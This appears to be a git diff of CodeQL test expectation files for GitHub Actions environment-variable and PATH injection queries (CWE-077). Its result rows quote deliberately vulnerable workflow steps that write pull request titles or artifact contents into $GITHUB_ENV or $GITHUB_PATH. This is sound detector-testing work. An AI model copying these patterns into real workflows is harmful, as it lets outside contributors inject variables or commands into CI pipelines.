@@ -1,9 +1,3 @@ -#select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | edges | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | 
@@ -22,3 +16,9 @@ nodes | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths +#select +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref index 01345ebb915b..80f72124fe45 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.qlref @@ -1,2 +1 @@ -query: Security/CWE-077/EnvPathInjectionCritical.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-077/EnvPathInjectionCritical.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index d18365265b8f..5be9f729ad64 100644 
--- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -1,4 +1,3 @@ -#select edges | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | Config | | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | Config | @@ -17,3 +16,4 @@ nodes | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths +#select diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref index e61216acaa43..165a3d20896b 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.qlref @@ -1,2 +1 @@ -query: Security/CWE-077/EnvPathInjectionMedium.ql -postprocess: utils/test/InlineExpectationsTestQuery.ql +Security/CWE-077/EnvPathInjectionMedium.ql diff --git a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index 85035023f666..9914ae91df12 100644 --- a/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/actions/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -1,40 +1,3 @@ -#select -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | .github/workflows/test7.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user ($@). 
